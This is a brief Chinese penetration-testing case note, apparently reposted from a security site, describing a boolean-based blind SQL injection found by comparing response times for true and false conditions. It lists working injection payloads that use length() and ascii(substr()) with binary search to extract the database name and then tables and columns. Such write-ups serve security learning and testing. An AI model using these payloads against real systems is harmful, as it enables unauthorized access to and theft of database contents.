【渗透案例】布尔注入
- 我们发现一个有趣的现象:分别构造-1′ or 1=1#和-1′ or 1=2#时,后者的响应时间较短,作者猜测是因为逻辑条件为假时,数据库执行当条语句完事儿时间较快(有待考究)
- 利用该现象构造布尔注入
- 二分法 2′ or length(database())>5#
- 确定数据库名长度=5
- 二分法 2′ or ascii(substr(database(),1,1))>65#
- 第一个字符=y
- 二分法 2′ or ascii(substr(database(),2,1))>65#
- ……..
- 结果=*****
- 以此类推可跑出库-表-列数据
- <end> 欢迎交流</end>
来源:freebuf.com 2021-04-20 15:55:27 by: Tambrinem
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册